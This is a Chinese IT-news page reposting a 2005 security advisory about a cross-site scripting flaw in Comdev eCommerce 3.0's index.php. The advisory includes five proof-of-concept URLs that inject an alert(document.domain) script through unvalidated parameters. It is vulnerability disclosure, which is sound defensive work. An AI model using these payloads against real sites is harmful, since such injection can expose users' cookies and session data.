网站公告列表

  没有公告

加入收藏
设为首页
在线投稿

您现在的位置: IT知识网 >> IT知识 >> 网络安全 >> 黑客攻击 >> 文章正文

 

  Comdev eCommerce中index.php存在输入合法性漏洞实现跨站脚本攻击           

Comdev eCommerce中index.php存在输入合法性漏洞实现跨站脚本攻击
作者:佚名 文章来源:不详 点击数: 更新时间:2006-12-5 21:03:15
安全公告ID:1013012
资料来源:http://securitytracker.com/id?1013012
原始资料:http://www.systemsecure.org/wwwboard/messages/222.html
CVE 参考:http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
发布日期:2005-1-26
发布作者:SmOk3 f00bar <smok3f00@gmail.com>
漏洞影响:泄露验证信息,泄露用户信息,执行任意代码,修改用户信息
影响系统:所有Linux , UNIX , Windows
含有漏洞利用程序:是
影响版本:3.0
漏洞起因:输入合法性错误


描述:SmOk3 of SystemSecure.org发现Comdev eCommerce中存在输入合法性漏洞,导致远程用户实现跨站脚本攻击。

'index.php'脚本中的start, category_id, keyword, pageaction 和 product_id 这几个参数对用户提交的数据验证不严。
因此,一个远程用户可以精心构造一个URL,当目标用户登陆到这个URL上时,就会在目标用户的浏览器上执行任意脚本代码。
这个代码来源于运行Comdev eCommerce软件的站点和运行在站点的安全内容上。结果是,目标用户的cookies(包括验证信息),
目标用户提交任何与站点有关的数据或者以目标用户的身份在站点上操作都会被代码获得。

提供如下测试方法:
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=

解决方法:
目前厂商还没有提供补丁或者升级程序
厂商地址:http://www.comdevweb.com/ecommerce.php

文章录入:wuyongjian    责任编辑:wuyongjian 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最 新 热 门
    相 关 文 章
    Cisco IOS OSPF邻居关系
    Cisco路由器OSPF协议经典
    Cisco IOS OSPF 邻居关系
    CISCO学习之OSPF和EIGRP
    CISCO学习问题之OSPF中的
    CISCO学习问题之OSPF中的
    CISCO学习问题之OSPF 虚
    CISCO学习问题之OSPF中的
    CISCO学习问题之OSPF中的
    CISCO学习问题之RIP网络
     
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    Copyright© ITZS.NET All Rights Reserved
    QQ:272895858   ICP备案编号:吉ICP备07000044号
    IT知识网 站长:博浪